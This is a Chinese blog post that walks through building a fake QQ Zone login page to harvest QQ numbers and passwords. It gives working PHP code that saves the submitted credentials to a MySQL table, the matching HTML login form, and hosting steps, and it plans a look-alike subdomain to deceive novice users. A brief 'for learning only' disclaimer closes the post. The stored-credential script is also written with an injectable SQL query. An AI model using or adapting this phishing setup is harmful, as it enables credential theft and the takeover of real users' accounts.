今天在群里,有个人发了个伪装qq空间的登录界面,也就是所谓的钓鱼网站。不知道的人会去登录,然后他们的qq号及密码会被记录,qq就这样被盗了。

外面下雨,呆宿舍无聊,于是我也想弄个玩玩。

其实思路很简单:做个高仿的qq空间登录界面->对用户输入的信息post到后台并存入数据库。

在学校用jsp也做了不少的xxx管理系统,知识都是相通的,php也差不多,下午花了点时间学了点php接收前台数据和写入数据库基本知识。下面开搞:

1.申请免费空间,我选择:http://www.freewebhostingarea.com/ 这个支持php,mysql.申请的空间 3个月没访问的话自动收回。申请成功会得到一个2级域名,这里我申请的是:http://fjut.ueuo.com

2.在它提供的phpMyAdmin中,新建一个表:qq_info 字段:qq, pwd。类型为varchar(20)。

3.写个测试后台接收数据并写入数据库的php页面 Info_Rec.php :

<?php
//接收参数
$nameStr=$HTTP_POST_VARS["name"];
$pwdStr=$HTTP_POST_VARS["pwd"];

//连接数据库
$con=mysql_connect("localhost","填写数据库名","填写密码") or die("<br>连接服务器失败!");
//sql语句串
$sql="insert into qq_info values('".$nameStr."','".$pwdStr."')";
//发送查询字符串
$query=mysql_db_query("填写数据库名", $sql, $con) or die("<br>写入数据库失败!");
echo "<br>保存到数据库成功!"
?>

4.前台页面,先写个测试页面 index.html :

<form method="post" action="Info_Rec.php">
qq号:<input name="name" type="text"  value=""/> 
<br>
密码:<input name="pwd" type="password"  value=""/>
<br>
<input  type="submit" name="Submit" value="登录"/>
</form>

5.上传2个页面文件到空间根目录。

6.打开http://fjut.ueuo.com输入qq号和密码,点登陆。

伪装qq空间登录-冯金伟博客园

7.响应成功:

伪装qq空间登录-冯金伟博客园

8.打开phpMyAdmin查看qq_info表,说明提交、写入数据库成功:

伪装qq空间登录-冯金伟博客园

9.基本功能有了。有时间的话把qq空间的登录界面扒过来做个高仿的,再重新申请个空间2级域名类似user.qzone……。更能达到迷惑小白的效果。

ps:学习交流,咋不做坏事哦。